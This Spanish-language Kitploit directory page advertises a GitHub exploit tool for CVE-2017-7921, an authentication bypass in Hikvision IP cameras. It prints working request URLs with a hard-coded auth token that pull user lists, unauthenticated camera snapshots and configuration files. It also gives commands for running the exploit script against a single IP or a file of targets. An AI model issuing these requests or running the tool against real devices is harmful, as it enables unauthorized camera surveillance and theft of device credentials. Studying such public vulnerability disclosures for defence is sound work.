Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-7921-EXP — Exploit para CVE-2017-7921 dirigido a dispositivos Hikvision con autenticación incorrecta. Obtiene listas de usuarios, capturas de cámara y archivos de configuración mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/inj3ction/cve-2017-7921-exp
Escalada de PrivilegiosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubinj3ction/cve-2017-7921-exp

CVE-2017-7921-EXP

Exploit para CVE-2017-7921 dirigido a dispositivos Hikvision con autenticación incorrecta. Obtiene listas de usuarios, capturas de cámara y archivos de configuración mediante solicitudes HTTP manipuladas.

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2017-7921

Se descubrió un problema de autenticación inadecuada en dispositivos Hikvision.

​ La vulnerabilidad de autenticación inadecuada ocurre cuando una aplicación no autentica a los usuarios de manera adecuada o correcta.

​ Esto puede permitir que un usuario malintencionado escale sus privilegios en el sistema y obtenga acceso a información sensible.

root@kitploit:~
       # inj3ction

​ https://seclists.org/fulldisclosure/2017/Sep/23

​ Detalles de la vulnerabilidad:

​ ----------------------

​ Obtener una lista de todos los usuarios y sus roles:

​ http://camera.ip/Security/users?auth=YWRtaW46MTEK

​ Obtener una instantánea de la cámara sin autenticación:

​ http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​ Y lo peor de todo, se puede descargar la configuración de la cámara:

​ http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Instalar dependencias

root@kitploit:~
python3 -m pip install -r requirements.txt

Uso

root@kitploit:~
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run

Captura de pantalla

Descargar herramienta